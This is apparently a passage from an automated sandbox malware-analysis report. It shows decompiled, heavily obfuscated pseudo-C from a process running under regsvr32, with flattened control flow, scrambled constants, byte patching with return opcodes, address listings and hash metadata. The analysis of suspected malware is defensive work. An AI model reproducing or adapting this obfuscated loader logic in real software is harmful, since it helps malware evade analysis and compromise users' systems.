                                                                                                                										__eflags = E001AD2C9(_t657, _v316, _v172, _v324,  &_v36, _v48, _v140, E001BF5D9(_v84, _v288, __eflags)) - _v76;
                                                                                                                										_t677 =  ==  ? 0xcffed49 : 0x5cb3ec9;
                                                                                                                										E001BF94B(_t657, _v56, _v220, _v188, _v124);
                                                                                                                										_t767 =  &(_t763[0xf]);
                                                                                                                										E001BF94B(_t658, _v244, _v212, _v308, _v196);
                                                                                                                										_t744 = 0x6db7fd8;
                                                                                                                										goto L15;
                                                                                                                									} else {
                                                                                                                										if(_t677 == _t758) {
                                                                                                                											_t665 = E001BCEFF(_v236, _v156, 0x20, _v40, _t682, _v180, _v304, _v92);
                                                                                                                											_t763 =  &(_t763[6]);
                                                                                                                											_t677 = 0xd17ebbc;
                                                                                                                											__eflags = _t665 - _v44;
                                                                                                                											_t761 =  ==  ? 1 : _t761;
                                                                                                                											goto L11;
                                                                                                                										} else {
                                                                                                                											if(_t677 == _t651) {
                                                                                                                												_t667 = E001BFE12(_v280, _v132, _v40, _v312, _a12, _v176, _a16);
                                                                                                                												_t763 =  &(_t763[5]);
                                                                                                                												__eflags = _t667 - _v164;
                                                                                                                												_t677 =  ==  ? _t758 : 0xd17ebbc;
                                                                                                                												goto L11;
                                                                                                                											} else {
                                                                                                                												if(_t677 != 0x6a74054) {
                                                                                                                													goto L28;
                                                                                                                												} else {
                                                                                                                													E001B17D2(_v256, _v320, _v32);
                                                                                                                													_t677 = _t744;
                                                                                                                													goto L11;
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L31;
                                                                                                                							L28:
                                                                                                                							__eflags = _t677 - 0x5cb3ec9;
                                                                                                                						} while (__eflags != 0);
                                                                                                                						goto L31;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}
                                                                                                                0x001bafe0
                                                                                                                0x001baff4
                                                                                                                0x001baff9
                                                                                                                0x001bb002
                                                                                                                0x001bb00d
                                                                                                                0x001bb018
                                                                                                                0x001bb020
                                                                                                                0x001bb02b
                                                                                                                0x001bb03e
                                                                                                                0x001bb041
                                                                                                                0x001bb048
                                                                                                                0x001bb053
                                                                                                                0x001bb05e
                                                                                                                0x001bb069
                                                                                                                0x001bb074
                                                                                                                0x001bb08a
                                                                                                                0x001bb091
                                                                                                                0x001bb09c
                                                                                                                0x001bb0a7
                                                                                                                0x001bb0b2
                                                                                                                0x001bb0bd
                                                                                                                0x001bb0c8
                                                                                                                0x001bb0d0
                                                                                                                0x001bb0db
                                                                                                                0x001bb0e6
                                                                                                                0x001bb0f1
                                                                                                                0x001bb0fc
                                                                                                                0x001bb107
                                                                                                                0x001bb10f
                                                                                                                0x001bb11b
                                                                                                                0x001bb11e
                                                                                                                0x001bb122
                                                                                                                0x001bb12a
                                                                                                                0x001bb13d
                                                                                                                0x001bb144
                                                                                                                0x001bb14f
                                                                                                                0x001bb160
                                                                                                                0x001bb163
                                                                                                                0x001bb167
                                                                                                                0x001bb16f
                                                                                                                0x001bb174
                                                                                                                0x001bb17c
                                                                                                                0x001bb184
                                                                                                                0x001bb18c
                                                                                                                0x001bb19c
                                                                                                                0x001bb1a0
                                                                                                                0x001bb1a8
                                                                                                                0x001bb1b5
                                                                                                                0x001bb1b6
                                                                                                                0x001bb1ba
                                                                                                                0x001bb1bf
                                                                                                                0x001bb1c4
                                                                                                                0x001bb1cc
                                                                                                                0x001bb1d7
                                                                                                                0x001bb1e2
                                                                                                                0x001bb1ed
                                                                                                                0x001bb1f5
                                                                                                                0x001bb1fa
                                                                                                                0x001bb202
                                                                                                                0x001bb20a
                                                                                                                0x001bb212
                                                                                                                0x001bb21a
                                                                                                                0x001bb222
                                                                                                                0x001bb22a
                                                                                                                0x001bb232
                                                                                                                0x001bb23d
                                                                                                                0x001bb248
                                                                                                                0x001bb250
                                                                                                                0x001bb25b
                                                                                                                0x001bb266
                                                                                                                0x001bb271
                                                                                                                0x001bb27c
                                                                                                                0x001bb28a
                                                                                                                0x001bb28e
                                                                                                                0x001bb296
                                                                                                                0x001bb29b
                                                                                                                0x001bb2a3
                                                                                                                0x001bb2ae
                                                                                                                0x001bb2b9
                                                                                                                0x001bb2c4
                                                                                                                0x001bb2d7
                                                                                                                0x001bb2de
                                                                                                                0x001bb2e9
                                                                                                                0x001bb2f4
                                                                                                                0x001bb2fc
                                                                                                                0x001bb307
                                                                                                                0x001bb30f
                                                                                                                0x001bb317
                                                                                                                0x001bb31f
                                                                                                                0x001bb327
                                                                                                                0x001bb332
                                                                                                                0x001bb33d
                                                                                                                0x001bb348
                                                                                                                0x001bb353
                                                                                                                0x001bb35e
                                                                                                                0x001bb369
                                                                                                                0x001bb374
                                                                                                                0x001bb37c
                                                                                                                0x001bb384
                                                                                                                0x001bb389
                                                                                                                0x001bb391
                                                                                                                0x001bb39c
                                                                                                                0x001bb3a4
                                                                                                                0x001bb3af
                                                                                                                0x001bb3ba
                                                                                                                0x001bb3c2
                                                                                                                0x001bb3cc
                                                                                                                0x001bb3d4
                                                                                                                0x001bb3dc
                                                                                                                0x001bb3e4
                                                                                                                0x001bb3ef
                                                                                                                0x001bb404
                                                                                                                0x001bb407
                                                                                                                0x001bb40e
                                                                                                                0x001bb419
                                                                                                                0x001bb424
                                                                                                                0x001bb42b
                                                                                                                0x001bb436
                                                                                                                0x001bb441
                                                                                                                0x001bb44c
                                                                                                                0x001bb457
                                                                                                                0x001bb462
                                                                                                                0x001bb46d
                                                                                                                0x001bb478
                                                                                                                0x001bb483
                                                                                                                0x001bb48e
                                                                                                                0x001bb499
                                                                                                                0x001bb4a4
                                                                                                                0x001bb4af
                                                                                                                0x001bb4ba
                                                                                                                0x001bb4c5
                                                                                                                0x001bb4db
                                                                                                                0x001bb4e2
                                                                                                                0x001bb4ed
                                                                                                                0x001bb4f5
                                                                                                                0x001bb4fd
                                                                                                                0x001bb505
                                                                                                                0x001bb50d
                                                                                                                0x001bb515
                                                                                                                0x001bb520
                                                                                                                0x001bb528
                                                                                                                0x001bb533
                                                                                                                0x001bb53e
                                                                                                                0x001bb546
                                                                                                                0x001bb54b
                                                                                                                0x001bb553
                                                                                                                0x001bb55b
                                                                                                                0x001bb566
                                                                                                                0x001bb571
                                                                                                                0x001bb57c
                                                                                                                0x001bb587
                                                                                                                0x001bb592
                                                                                                                0x001bb59d
                                                                                                                0x001bb5a5
                                                                                                                0x001bb5b1
                                                                                                                0x001bb5b6
                                                                                                                0x001bb5bc
                                                                                                                0x001bb5c4
                                                                                                                0x001bb5cc
                                                                                                                0x001bb5de
                                                                                                                0x001bb5e1
                                                                                                                0x001bb5e8
                                                                                                                0x001bb5f3
                                                                                                                0x001bb5fe
                                                                                                                0x001bb606
                                                                                                                0x001bb611
                                                                                                                0x001bb61c
                                                                                                                0x001bb624
                                                                                                                0x001bb62f
                                                                                                                0x001bb63a
                                                                                                                0x001bb645
                                                                                                                0x001bb64d
                                                                                                                0x001bb658
                                                                                                                0x001bb663
                                                                                                                0x001bb670
                                                                                                                0x001bb67b
                                                                                                                0x001bb68f
                                                                                                                0x001bb694
                                                                                                                0x001bb69d
                                                                                                                0x001bb6a8
                                                                                                                0x001bb6b5
                                                                                                                0x001bb6b8
                                                                                                                0x001bb6bc
                                                                                                                0x001bb6c4
                                                                                                                0x001bb6cc
                                                                                                                0x001bb6d4
                                                                                                                0x001bb6dc
                                                                                                                0x001bb6e1
                                                                                                                0x001bb6e9
                                                                                                                0x001bb6f1
                                                                                                                0x001bb6f6
                                                                                                                0x001bb6fb
                                                                                                                0x001bb703
                                                                                                                0x001bb70b
                                                                                                                0x001bb713
                                                                                                                0x001bb71b
                                                                                                                0x001bb723
                                                                                                                0x001bb72b
                                                                                                                0x001bb733
                                                                                                                0x001bb740
                                                                                                                0x001bb74c
                                                                                                                0x001bb750
                                                                                                                0x001bb758
                                                                                                                0x001bb760
                                                                                                                0x001bb768
                                                                                                                0x001bb76d
                                                                                                                0x001bb775
                                                                                                                0x001bb77d
                                                                                                                0x001bb788
                                                                                                                0x001bb798
                                                                                                                0x001bb799
                                                                                                                0x001bb7a0
                                                                                                                0x001bb7ab
                                                                                                                0x001bb7b3
                                                                                                                0x001bb7bb
                                                                                                                0x001bb7c3
                                                                                                                0x001bb7cb
                                                                                                                0x001bb7d6
                                                                                                                0x001bb7e1
                                                                                                                0x001bb7ec
                                                                                                                0x001bb7f4
                                                                                                                0x001bb801
                                                                                                                0x001bb80b
                                                                                                                0x001bb80f
                                                                                                                0x001bb817
                                                                                                                0x001bb82a
                                                                                                                0x001bb831
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: &$)U|$+u$4Mk$4Ur$?$Q;$i?r$y[A
                                                                                                                • API String ID: 0-3461261877
                                                                                                                • Opcode ID: e166ce53f26dfd8eb4a1b03722217f6ff9cc660b9fc7f1277785e6b0eca02262
                                                                                                                • Instruction ID: 05d35bb34e371bd02d774c1e56a85a2ded2ddef7ee8bd0d9bf169370aaec6796
                                                                                                                • Opcode Fuzzy Hash: e166ce53f26dfd8eb4a1b03722217f6ff9cc660b9fc7f1277785e6b0eca02262
                                                                                                                • Instruction Fuzzy Hash: 826200715093819BD378CF65C98AB9BBBE1FBC4308F10891DE2DA96260D7B18949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E001B1B29(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                				char _v36;
                                                                                                                				intOrPtr _v44;
                                                                                                                				intOrPtr _v76;
                                                                                                                				char* _v80;
                                                                                                                				intOrPtr _v84;
                                                                                                                				intOrPtr _v88;
                                                                                                                				char _v100;
                                                                                                                				signed int _v104;
                                                                                                                				intOrPtr _v108;
                                                                                                                				intOrPtr _v112;
                                                                                                                				char _v120;
                                                                                                                				intOrPtr _v124;
                                                                                                                				char _v128;
                                                                                                                				intOrPtr _v132;
                                                                                                                				signed int _v136;
                                                                                                                				signed int _v140;
                                                                                                                				signed int _v144;
                                                                                                                				signed int _v148;
                                                                                                                				signed int _v152;
                                                                                                                				unsigned int _v156;
                                                                                                                				signed int _v160;
                                                                                                                				signed int _v164;
                                                                                                                				signed int _v168;
                                                                                                                				signed int _v172;
                                                                                                                				signed int _v176;
                                                                                                                				signed int _v180;
                                                                                                                				signed int _v184;
                                                                                                                				unsigned int _v188;
                                                                                                                				signed int _v192;
                                                                                                                				signed int _v196;
                                                                                                                				signed int _v200;
                                                                                                                				signed int _v204;
                                                                                                                				signed int _v208;
                                                                                                                				signed int _v212;
                                                                                                                				signed int _v216;
                                                                                                                				signed int _v220;
                                                                                                                				signed int _v224;
                                                                                                                				unsigned int _v228;
                                                                                                                				signed int _v232;
                                                                                                                				signed int _v236;
                                                                                                                				signed int _v240;
                                                                                                                				signed int _v244;
                                                                                                                				signed int _v248;
                                                                                                                				signed int _v252;
                                                                                                                				unsigned int _v256;
                                                                                                                				signed int _v260;
                                                                                                                				signed int _v264;
                                                                                                                				signed int _v268;
                                                                                                                				signed int _v272;
                                                                                                                				signed int _v276;
                                                                                                                				signed int _v280;
                                                                                                                				signed int _v284;
                                                                                                                				void* _t389;
                                                                                                                				intOrPtr _t429;
                                                                                                                				signed int _t433;
                                                                                                                				void* _t442;
                                                                                                                				void* _t449;
                                                                                                                				void* _t457;
                                                                                                                				intOrPtr* _t459;
                                                                                                                				void* _t461;
                                                                                                                				signed char* _t473;
                                                                                                                				signed char* _t511;
                                                                                                                				intOrPtr* _t512;
                                                                                                                				intOrPtr _t513;
                                                                                                                				intOrPtr _t515;
                                                                                                                				void* _t516;
                                                                                                                				signed char* _t517;
                                                                                                                				signed int _t518;
                                                                                                                				signed int _t519;
                                                                                                                				signed int _t520;
                                                                                                                				signed int _t521;
                                                                                                                				signed int _t522;
                                                                                                                				signed int _t523;
                                                                                                                				signed int _t524;
                                                                                                                				signed int _t525;
                                                                                                                				signed int _t526;
                                                                                                                				signed int _t527;
                                                                                                                				signed int _t528;
                                                                                                                				intOrPtr _t529;
                                                                                                                				signed int* _t531;
                                                                                                                				signed int* _t532;
                                                                                                                				void* _t534;
                                                                                                                
                                                                                                                				_t512 = _a16;
                                                                                                                				_t459 = __ecx;
                                                                                                                				_push(_t512);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t389);
                                                                                                                				_v104 = _v104 & 0x00000000;
                                                                                                                				_t531 =  &(( &_v284)[6]);
                                                                                                                				_v112 = 0x664852;
                                                                                                                				_v108 = 0x764e71;
                                                                                                                				_t513 = 0;
                                                                                                                				_v216 = 0x4f6549;
                                                                                                                				_t461 = 0x20b9346;
                                                                                                                				_v216 = _v216 >> 1;
                                                                                                                				_v216 = _v216 + 0xffff9437;
                                                                                                                				_v216 = _v216 ^ 0x002746db;
                                                                                                                				_v196 = 0xdd0e12;
                                                                                                                				_v196 = _v196 >> 6;
                                                                                                                				_v196 = _v196 + 0xffff6c8c;
                                                                                                                				_v196 = _v196 ^ 0x0002e084;
                                                                                                                				_v180 = 0x98bbd0;
                                                                                                                				_t518 = 0x57;
                                                                                                                				_v180 = _v180 / _t518;
                                                                                                                				_t519 = 0x51;
                                                                                                                				_v180 = _v180 / _t519;
                                                                                                                				_v180 = _v180 ^ 0x000005cc;
                                                                                                                				_v144 = 0x85ed12;
                                                                                                                				_v144 = _v144 ^ 0xf75a6943;
                                                                                                                				_v144 = _v144 ^ 0xf7d0674e;
                                                                                                                				_v260 = 0xad0f44;
                                                                                                                				_v260 = _v260 | 0x104cdc68;
                                                                                                                				_v260 = _v260 + 0xed83;
                                                                                                                				_v260 = _v260 + 0xffffc029;
                                                                                                                				_v260 = _v260 ^ 0x10e31ea2;
                                                                                                                				_v276 = 0xc7b594;
                                                                                                                				_v276 = _v276 | 0x878ae8e1;
                                                                                                                				_v276 = _v276 ^ 0xd8f988dc;
                                                                                                                				_t520 = 0x2a;
                                                                                                                				_v132 = 0;
                                                                                                                				_v276 = _v276 / _t520;
                                                                                                                				_v276 = _v276 ^ 0x02494d5a;
                                                                                                                				_v252 = 0x88c97a;
                                                                                                                				_v252 = _v252 << 0xe;
                                                                                                                				_v252 = _v252 + 0x1264;
                                                                                                                				_v252 = _v252 | 0xbb34708f;
                                                                                                                				_v252 = _v252 ^ 0xbb719559;
                                                                                                                				_v164 = 0x4147af;
                                                                                                                				_v164 = _v164 + 0xffff1859;
                                                                                                                				_v164 = _v164 ^ 0x004aa0da;
                                                                                                                				_v172 = 0xc12e3c;
                                                                                                                				_v172 = _v172 ^ 0xfb0365cf;
                                                                                                                				_v172 = _v172 ^ 0xfbc0c8a9;
                                                                                                                				_v236 = 0x3d8e78;
                                                                                                                				_v236 = _v236 << 2;
                                                                                                                				_v236 = _v236 + 0xffff2a6b;
                                                                                                                				_v236 = _v236 ^ 0x00f18efb;
                                                                                                                				_v224 = 0x3a6891;
                                                                                                                				_v224 = _v224 + 0xffff9448;
                                                                                                                				_v224 = _v224 ^ 0x2f40b269;
                                                                                                                				_v224 = _v224 ^ 0x2f735a44;
                                                                                                                				_v160 = 0x331e0;
                                                                                                                				_v160 = _v160 * 0x43;
                                                                                                                				_v160 = _v160 ^ 0x00d51405;
                                                                                                                				_v168 = 0x9626f3;
                                                                                                                				_v168 = _v168 + 0xffffc9f3;
                                                                                                                				_v168 = _v168 ^ 0x009dd9d5;
                                                                                                                				_v188 = 0xd0cf83;
                                                                                                                				_v188 = _v188 + 0xffff21c9;
                                                                                                                				_v188 = _v188 >> 5;
                                                                                                                				_v188 = _v188 ^ 0x0003b221;
                                                                                                                				_v156 = 0x2f0f97;
                                                                                                                				_v156 = _v156 >> 0xd;
                                                                                                                				_v156 = _v156 ^ 0x00090060;
                                                                                                                				_v228 = 0x329c72;
                                                                                                                				_t521 = 0x6b;
                                                                                                                				_v228 = _v228 * 0x4b;
                                                                                                                				_v228 = _v228 >> 8;
                                                                                                                				_v228 = _v228 ^ 0x000fa717;
                                                                                                                				_v184 = 0xde2a7b;
                                                                                                                				_v184 = _v184 << 0x10;
                                                                                                                				_v184 = _v184 / _t521;
                                                                                                                				_v184 = _v184 ^ 0x0068278f;
                                                                                                                				_v192 = 0x40c987;
                                                                                                                				_v192 = _v192 * 0x4e;
                                                                                                                				_v192 = _v192 + 0x17c1;
                                                                                                                				_v192 = _v192 ^ 0x13b16fae;
                                                                                                                				_v256 = 0xc3f59b;
                                                                                                                				_v256 = _v256 >> 2;
                                                                                                                				_v256 = _v256 >> 0xf;
                                                                                                                				_v256 = _v256 + 0xffff9c39;
                                                                                                                				_v256 = _v256 ^ 0xfffe80b9;
                                                                                                                				_v264 = 0x6ae9d2;
                                                                                                                				_v264 = _v264 * 0x65;
                                                                                                                				_v264 = _v264 / _t521;
                                                                                                                				_t522 = 0xe;
                                                                                                                				_v264 = _v264 * 0x65;
                                                                                                                				_v264 = _v264 ^ 0x27d78059;
                                                                                                                				_v280 = 0x28e312;
                                                                                                                				_v280 = _v280 | 0xac9038e9;
                                                                                                                				_v280 = _v280 / _t522;
                                                                                                                				_v280 = _v280 << 2;
                                                                                                                				_v280 = _v280 ^ 0x31555bc5;
                                                                                                                				_v212 = 0xe93993;
                                                                                                                				_t523 = 0x19;
                                                                                                                				_v212 = _v212 / _t523;
                                                                                                                				_v212 = _v212 << 2;
                                                                                                                				_v212 = _v212 ^ 0x002a1c87;
                                                                                                                				_v284 = 0x7db97e;
                                                                                                                				_v284 = _v284 + 0xffff53d8;
                                                                                                                				_v284 = _v284 | 0x36a49b8c;
                                                                                                                				_v284 = _v284 * 0x5e;
                                                                                                                				_v284 = _v284 ^ 0x312e7f49;
                                                                                                                				_v272 = 0x6084e8;
                                                                                                                				_v272 = _v272 + 0xffffe488;
                                                                                                                				_v272 = _v272 << 0xd;
                                                                                                                				_v272 = _v272 ^ 0x4662a03b;
                                                                                                                				_v272 = _v272 ^ 0x4b43d01f;
                                                                                                                				_v148 = 0x59dc25;
                                                                                                                				_v148 = _v148 | 0xa2da7dc3;
                                                                                                                				_v148 = _v148 ^ 0xa2d7e9fb;
                                                                                                                				_v204 = 0x2b31fd;
                                                                                                                				_v204 = _v204 << 2;
                                                                                                                				_v204 = _v204 ^ 0x28e6122b;
                                                                                                                				_v204 = _v204 ^ 0x2840e346;
                                                                                                                				_v244 = 0x520076;
                                                                                                                				_v244 = _v244 << 0xb;
                                                                                                                				_t524 = 0x46;
                                                                                                                				_v244 = _v244 / _t524;
                                                                                                                				_v244 = _v244 ^ 0x020519aa;
                                                                                                                				_v232 = 0xe22854;
                                                                                                                				_t234 =  &_v232; // 0xe22854
                                                                                                                				_t525 = 0x32;
                                                                                                                				_v232 =  *_t234 / _t525;
                                                                                                                				_v232 = _v232 + 0xffffec63;
                                                                                                                				_v232 = _v232 ^ 0x00009bdd;
                                                                                                                				_v140 = 0x1ef899;
                                                                                                                				_t526 = 0x13;
                                                                                                                				_v140 = _v140 * 0x7a;
                                                                                                                				_v140 = _v140 ^ 0x0ec1433e;
                                                                                                                				_v200 = 0x1538f1;
                                                                                                                				_v200 = _v200 ^ 0xfc54e9f1;
                                                                                                                				_v200 = _v200 / _t526;
                                                                                                                				_v200 = _v200 ^ 0x0d4c9d99;
                                                                                                                				_v208 = 0xdc7bed;
                                                                                                                				_v208 = _v208 | 0x4fe6e542;
                                                                                                                				_v208 = _v208 ^ 0x446d9a8c;
                                                                                                                				_v208 = _v208 ^ 0x0b950994;
                                                                                                                				_v152 = 0x5b0852;
                                                                                                                				_t527 = 5;
                                                                                                                				_v152 = _v152 / _t527;
                                                                                                                				_v152 = _v152 ^ 0x00151803;
                                                                                                                				_v176 = 0x1de77c;
                                                                                                                				_t528 = 0xa;
                                                                                                                				_v176 = _v176 * 0x50;
                                                                                                                				_t529 = _v132;
                                                                                                                				_v176 = _v176 / _t528;
                                                                                                                				_v176 = _v176 ^ 0x00e7f0f2;
                                                                                                                				_v268 = 0x2b2bd;
                                                                                                                				_v268 = _v268 + 0x209d;
                                                                                                                				_v268 = _v268 * 0x51;
                                                                                                                				_v268 = _v268 | 0xc2bcfc7e;
                                                                                                                				_v268 = _v268 ^ 0xc2f79e81;
                                                                                                                				_v240 = 0x1916a2;
                                                                                                                				_v240 = _v240 ^ 0x1b8638be;
                                                                                                                				_v240 = _v240 ^ 0x09b473f3;
                                                                                                                				_v240 = _v240 ^ 0x122bfb1c;
                                                                                                                				_v248 = 0xaef597;
                                                                                                                				_v248 = _v248 * 0x31;
                                                                                                                				_v248 = _v248 << 6;
                                                                                                                				_v248 = _v248 + 0xcba5;
                                                                                                                				_v248 = _v248 ^ 0x5f4126c9;
                                                                                                                				_v136 = 0x6e7e01;
                                                                                                                				_v136 = _v136 ^ 0xa8e44615;
                                                                                                                				_v136 = _v136 ^ 0xa88a3804;
                                                                                                                				_v220 = 0x5b02be;
                                                                                                                				_v220 = _v220 + 0xe988;
                                                                                                                				_v220 = _v220 ^ 0xe5e6b7ff;
                                                                                                                				_v220 = _v220 ^ 0xe5bd5b39;
                                                                                                                				goto L1;
                                                                                                                				do {
                                                                                                                					while(1) {
                                                                                                                						L1:
                                                                                                                						_t534 = _t461 - 0x6a2e165;
                                                                                                                						if(_t534 > 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						if(_t534 == 0) {
                                                                                                                							_push(_v220);
                                                                                                                							_t529 = E001B96D4(_t461, _v136);
                                                                                                                							_t531 =  &(_t531[3]);
                                                                                                                							_t461 = 0x8028098;
                                                                                                                							 *((intOrPtr*)(_t459 + 4)) = _v196 + _v124 + _t529;
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							if(_t461 == 0x1967615) {
                                                                                                                								E001B17D2(_v176, _v268, _v128);
                                                                                                                								_t461 = 0xa6f1a29;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								if(_t461 == 0x1c212ef) {
                                                                                                                									_push(_t461);
                                                                                                                									_t442 = E001BAF0B( &_v36, _v144, _v260, _v276,  *_t512,  *((intOrPtr*)(_t512 + 4)), _v252);
                                                                                                                									_t531 =  &(_t531[6]);
                                                                                                                									if(_t442 != 0) {
                                                                                                                										_t461 = 0x2cf5daf;
                                                                                                                										continue;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									if(_t461 == 0x20b9346) {
                                                                                                                										_t461 = 0x1c212ef;
                                                                                                                										continue;
                                                                                                                									} else {
                                                                                                                										if(_t461 != 0x2cf5daf) {
                                                                                                                											goto L27;
                                                                                                                										} else {
                                                                                                                											_v44 = _a8;
                                                                                                                											_v80 =  &_v36;
                                                                                                                											_v88 =  *_t512;
                                                                                                                											_v84 =  *((intOrPtr*)(_t512 + 4));
                                                                                                                											_v76 = 0x20;
                                                                                                                											_t449 = E001B7730(_v172,  &_v120, _v236,  &_v100, _v224);
                                                                                                                											_t531 =  &(_t531[4]);
                                                                                                                											if(_t449 != 0) {
                                                                                                                												_t461 = 0xa83b70f;
                                                                                                                												continue;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L30:
                                                                                                                						return _t513;
                                                                                                                					}
                                                                                                                					if(_t461 == 0x8028098) {
                                                                                                                						_push(_t461);
                                                                                                                						_t429 = E001A303A(_t461,  *((intOrPtr*)(_t459 + 4)));
                                                                                                                						_t531 =  &(_t531[3]);
                                                                                                                						 *_t459 = _t429;
                                                                                                                						if(_t429 == 0) {
                                                                                                                							_t461 = 0x1967615;
                                                                                                                							goto L27;
                                                                                                                						} else {
                                                                                                                							_t461 = 0xbbe0ddd;
                                                                                                                							_t513 = 1;
                                                                                                                							_v132 = 1;
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						if(_t461 == 0xa6f1a29) {
                                                                                                                							E001B17D2(_v240, _v248, _v120);
                                                                                                                						} else {
                                                                                                                							if(_t461 == 0xa83b70f) {
                                                                                                                								_t433 = E001B490E( &_v128, _v168,  &_v120);
                                                                                                                								asm("sbb ecx, ecx");
                                                                                                                								_t461 = ( ~_t433 & 0xfc33c73c) + 0xa6f1a29;
                                                                                                                								goto L1;
                                                                                                                							} else {
                                                                                                                								if(_t461 != 0xbbe0ddd) {
                                                                                                                									goto L27;
                                                                                                                								} else {
                                                                                                                									_t515 =  *_t459;
                                                                                                                									E001B6845(_v280, _t515, _v212, _v284);
                                                                                                                									_t516 = _t515 + _v180;
                                                                                                                									E001BFD42(_v124, _v272, _v128, _v148, _t516, _v204);
                                                                                                                									_t517 = _t516 + _v124;
                                                                                                                									_push(_t517);
                                                                                                                									_t366 =  &_v140; // 0x664852
                                                                                                                									_push( *_t366);
                                                                                                                									_push(_v232);
                                                                                                                									E001A2F36(_v244, _t529);
                                                                                                                									_t511 =  &(_t517[_t529]);
                                                                                                                									_t532 =  &(_t531[9]);
                                                                                                                									_t473 = _t517;
                                                                                                                									if(_t517 < _t511) {
                                                                                                                										do {
                                                                                                                											if(( *_t473 & 0x000000ff) == _v216) {
                                                                                                                												 *_t473 = 0xc3;
                                                                                                                											}
                                                                                                                											_t473 =  &(_t473[1]);
                                                                                                                										} while (_t473 < _t511);
                                                                                                                									}
                                                                                                                									_push(0xe);
                                                                                                                									_t457 = E001B96D4(_t473, 0);
                                                                                                                									_t531 =  &(_t532[3]);
                                                                                                                									_t461 = 0x1967615;
                                                                                                                									 *((char*)(_t457 + _t517)) = 0;
                                                                                                                									_t513 = _v132;
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					goto L30;
                                                                                                                					L27:
                                                                                                                				} while (_t461 != 0xe2411a0);
                                                                                                                				goto L30;
                                                                                                                			}





















































































                                                                                                                0x001b2226
                                                                                                                0x001b222d
                                                                                                                0x001b223b
                                                                                                                0x00000000
                                                                                                                0x001b20f4
                                                                                                                0x001b20fa
                                                                                                                0x001b21f4
                                                                                                                0x001b21fa
                                                                                                                0x00000000
                                                                                                                0x001b2100
                                                                                                                0x001b2106
                                                                                                                0x001b21a8
                                                                                                                0x001b21c8
                                                                                                                0x001b21cd
                                                                                                                0x001b21d2
                                                                                                                0x001b21d8
                                                                                                                0x00000000
                                                                                                                0x001b21d8
                                                                                                                0x001b210c
                                                                                                                0x001b2112
                                                                                                                0x001b219e
                                                                                                                0x00000000
                                                                                                                0x001b2118
                                                                                                                0x001b211e
                                                                                                                0x00000000
                                                                                                                0x001b2124
                                                                                                                0x001b212f
                                                                                                                0x001b213d
                                                                                                                0x001b2146
                                                                                                                0x001b2150
                                                                                                                0x001b2179
                                                                                                                0x001b2184
                                                                                                                0x001b2189
                                                                                                                0x001b218e
                                                                                                                0x001b2194
                                                                                                                0x00000000
                                                                                                                0x001b2194
                                                                                                                0x001b218e
                                                                                                                0x001b211e
                                                                                                                0x001b2112
                                                                                                                0x001b2106
                                                                                                                0x001b20fa
                                                                                                                0x001b23bb
                                                                                                                0x001b23c6
                                                                                                                0x001b23c6
                                                                                                                0x001b2249
                                                                                                                0x001b236b
                                                                                                                0x001b2370
                                                                                                                0x001b2375
                                                                                                                0x001b2378
                                                                                                                0x001b237c
                                                                                                                0x001b2392
                                                                                                                0x00000000
                                                                                                                0x001b237e
                                                                                                                0x001b2380
                                                                                                                0x001b2385
                                                                                                                0x001b2386
                                                                                                                0x00000000
                                                                                                                0x001b2386
                                                                                                                0x001b224f
                                                                                                                0x001b2255
                                                                                                                0x001b23b4
                                                                                                                0x001b225b
                                                                                                                0x001b2261
                                                                                                                0x001b233d
                                                                                                                0x001b2348
                                                                                                                0x001b2350
                                                                                                                0x00000000
                                                                                                                0x001b2267
                                                                                                                0x001b226d
                                                                                                                0x00000000
                                                                                                                0x001b2273
                                                                                                                0x001b2277
                                                                                                                0x001b2283
                                                                                                                0x001b228f
                                                                                                                0x001b22af
                                                                                                                0x001b22b4
                                                                                                                0x001b22bd
                                                                                                                0x001b22be
                                                                                                                0x001b22be
                                                                                                                0x001b22c5
                                                                                                                0x001b22cd
                                                                                                                0x001b22d2
                                                                                                                0x001b22d5
                                                                                                                0x001b22d8
                                                                                                                0x001b22dc
                                                                                                                0x001b22de
                                                                                                                0x001b22e5
                                                                                                                0x001b22e7
                                                                                                                0x001b22e7
                                                                                                                0x001b22ea
                                                                                                                0x001b22eb
                                                                                                                0x001b22de
                                                                                                                0x001b22fe
                                                                                                                0x001b2303
                                                                                                                0x001b2308
                                                                                                                0x001b230b
                                                                                                                0x001b2310
                                                                                                                0x001b2314
                                                                                                                0x00000000
                                                                                                                0x001b2314
                                                                                                                0x001b226d
                                                                                                                0x001b2261
                                                                                                                0x001b2255
                                                                                                                0x00000000
                                                                                                                0x001b2397
                                                                                                                0x001b2397
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
